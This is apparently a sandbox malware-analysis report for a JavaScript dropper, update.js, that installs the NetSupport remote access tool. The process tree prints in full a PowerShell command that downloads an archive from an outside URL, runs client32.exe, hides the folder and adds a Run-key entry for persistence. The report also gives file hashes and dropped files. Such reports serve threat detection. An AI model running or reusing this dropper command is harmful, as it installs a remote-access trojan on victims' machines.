Overview

overview

10

Static

static

1

update.js

windows10-1703-x64

10

update.js

windows10-2004-x64

10

update.js

windows11-21h2-x64

10

Analysis

  • max time kernel
    87s
  • max time network
    125s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231222-en
  • resource tags

    arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29/01/2024, 18:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    update.js

  • Size

    114KB

  • MD5

    1e5517d4390ea9cf0a97bc08a88ce8f9

  • SHA1

    75ab46b29fb2a43710cee16f6947dc31763921ca

  • SHA256

    7a153e840b1e15b0ca6f9c99072fb34efc759c6f96e24b1c01d8cfc1b5cf9e78

  • SHA512

    354d548f71853a127d993285b97420e7c89cef1526535d9d0bb058a798b4accd9c0d98fe13b4bfb45452beb1c8a7b8254723ebe2ad50fe18dceeab61bf28036f

  • SSDEEP

    1536:AlarcxElarcxElarcxRlarcx4QNlarcxElarcxElarcx8larcxElarcxElarcxu:ADxEDxEDxRDxxDxEDxEDx8DxEDxEDxu

Score
10/10
netsupportpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://ghostcitygames.com/data.php?8788
exe.dropper

https://ghostcitygames.com/data.php?8788

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\update.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ZPGikOnkUuHvqwFnjEsZUbNjyHqeW='https://ghostcitygames.com/data.php?8788';$SoBseWjQCbXsIdUcIgcz=(New-Object System.Net.WebClient).DownloadString($ZPGikOnkUuHvqwFnjEsZUbNjyHqeW);$bJaQgoixMmUUWVGctFLemiVGAtKDe=[System.Convert]::FromBase64String($SoBseWjQCbXsIdUcIgcz);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $WLUWUqgepgVRefnUu=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $WLUWUqgepgVRefnUu -PathType Container)) { New-Item -Path $WLUWUqgepgVRefnUu -ItemType Directory };$p=Join-Path $WLUWUqgepgVRefnUu 'lol.zip';[System.IO.File]::WriteAllBytes($p,$bJaQgoixMmUUWVGctFLemiVGAtKDe);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$WLUWUqgepgVRefnUu)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $WLUWUqgepgVRefnUu 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $WLUWUqgepgVRefnUu -Force; $FSDFSSD.attributes='Hidden';$s=$WLUWUqgepgVRefnUu+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Users\Admin\AppData\Roaming\DIVX305\client32.exe
        "C:\Users\Admin\AppData\Roaming\DIVX305\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3104

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1a4i4qz.knj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\HTCTL32.DLL
    Filesize

    57KB

    MD5

    beed0effa708459efcdc16c3be47390e

    SHA1

    870feb986517081962bbd489d4e2dc32f14c557f

    SHA256

    e392330e008ffd3951ad9c1b552d6b94201a829aa04463257de277828777b909

    SHA512

    46d8251f81436af8493dd4e1a24f660b31c8deef0265606f3b482973078148713f280ee346775cafa7af0db68cff49106fe9ee8e8668a013255d7d7778116523

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\HTCTL32.DLL
    Filesize

    1KB

    MD5

    b09cf553d6779f7525ce8d22899150da

    SHA1

    798a8100ce14bb1bb06f3ed98647e750325e801b

    SHA256

    66b709303d1193bf851fc9f17274e75fb6220c5ca4998b054d43f9888b3d7e0a

    SHA512

    b741e5a497c584bc1ce3054d659ca522f6d3bdf17183e0abd8e82f2c9ad5659da918182955fdf6abe88f8a56aa70bf80a97ab0cf59eaf0f206c84b77cf8ec722

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\MSVCR100.dll
    Filesize

    96KB

    MD5

    482ad6e3fb5c2406e6741bce37567694

    SHA1

    f0174a44f97df0c2557806cd021ea493bb018d43

    SHA256

    ed94fb4c194aa86a2b5f2324066bd5e67bc8cc80ceff478d201c095008b0db92

    SHA512

    8d61457a9a519d57ef30739a499c546c99097b1f1f650f8268904be0ea976fbad835c49d4b435385bfe621b0d7930d060332a652083c0924a2d4a00b2043fb77

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\NSM.LIC
    Filesize

    258B

    MD5

    1b41e64c60ca9dfadeb063cd822ab089

    SHA1

    abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

    SHA256

    f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

    SHA512

    c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\PCICHEK.DLL
    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\PCICL32.DLL
    Filesize

    1.6MB

    MD5

    84dbd0d8bba5e67457cf452244680240

    SHA1

    63537ac8ad7990073240ef70286234981f4ca5de

    SHA256

    1a2ca2418fcbf806e7d6fb633f26b25da7cf78282aa6dca47509f5c5f3291b21

    SHA512

    87022336432d4bff68cfaa5c8c26e3c9c650c54de758a1524fd7e07cc8a3ee11947d3678d02455f1c5a2313304e7c51e1a2464ae402e04f7cf7ab9723289bd97

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\PCICL32.dll
    Filesize

    1.7MB

    MD5

    01dd9d9365139f35504056e66c043350

    SHA1

    18478d2921569de321f7c91adecd704f193a76ee

    SHA256

    5a68ccee63eacfd5ecaafdc23a2344fd17766dd016ef21aa118c10fa7f6129b2

    SHA512

    1654eb2207c85160c55913a7f87a22bf0f64984ea41209715d3e74dfc81439e05737a944090d307ee8c50d7b60c5aa963be7020ada2e9f403210064f30ea18ce

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\client32.exe
    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\client32.exe
    Filesize

    59KB

    MD5

    ab6a1685b0ff61ff9f8f2edc381fbe26

    SHA1

    08b821ddfabe4492878ba88abf0dfa17fab3ff37

    SHA256

    1eae38545767a8cbf46bb1a0839ac73cdfbf69e3617a7aa8f1a0a115dc9e78bf

    SHA512

    6b358948a8c1d97b49be7dcf24d32c32cddff4da95315cf3b127742073ae8a26e782edacce38004e38edf5f042c65d02e8453219d1007549da43ef2f9a120a00

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\client32.ini
    Filesize

    701B

    MD5

    98043670d8c850e878e333312fcfa25a

    SHA1

    dc795e8b906d70ee5854a6797e0c1557375bc443

    SHA256

    0e7679bf30f5278850e4ff560975cce34d125e04463290ca8c0bf7065da3eecc

    SHA512

    13295bcf155a8dbc0afaa44dd746801e8087a3f3436c43b2879dbd1f7895faed122f06235814be887d6e305bf181135fc07b6beebf3ea30435282050ac88f201

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\msvcr100.dll
    Filesize

    20KB

    MD5

    17387c018ef8e5cb9fab06dea3fd0f9c

    SHA1

    511d34c03f8c744645b0039f9a44aea2a4d8d060

    SHA256

    a3f6d28f0efa3633bc29089b08bba9369282689ca579ff93c696513618fbc5de

    SHA512

    70354f5bd14797cf5f74f85f1e4ea496057e976c6360b6f67e46c26ab76db40b101cc1aa8393c186a5e38b22d9faee0752318f8b74975b5294f766fdc3ac5c04

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\msvcr100.dll
    Filesize

    18KB

    MD5

    acca01de0b24216d4823efeaf388748b

    SHA1

    33430b2a05e52cd813463716d515929d107c856f

    SHA256

    186db44e9736e772df6f1b5e1678ed86634bbf1e66a7b54c439cde1d1525a9db

    SHA512

    48a218ec6b9d65082dd71c49593c2e10d1ec6a3a4cf903e4f94cec1c0f54e5b3092658e85b7895105b6d367da6062c6c3c4e72c54076ef9826fce2f9d82432ad

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DIVX305\pcicapi.dll
    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

    Download Submit

  • memory/2484-82-0x00007FFDC0830000-0x00007FFDC12F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2484-15-0x000001E6CC7D0000-0x000001E6CC7E2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2484-14-0x000001E6CC7A0000-0x000001E6CC7AA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2484-11-0x000001E6B43C0000-0x000001E6B43D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2484-12-0x000001E6B43C0000-0x000001E6B43D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2484-10-0x000001E6B43C0000-0x000001E6B43D0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2484-9-0x00007FFDC0830000-0x00007FFDC12F2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2484-8-0x000001E6CC720000-0x000001E6CC742000-memory.dmp

    Filesize

    136KB

    Download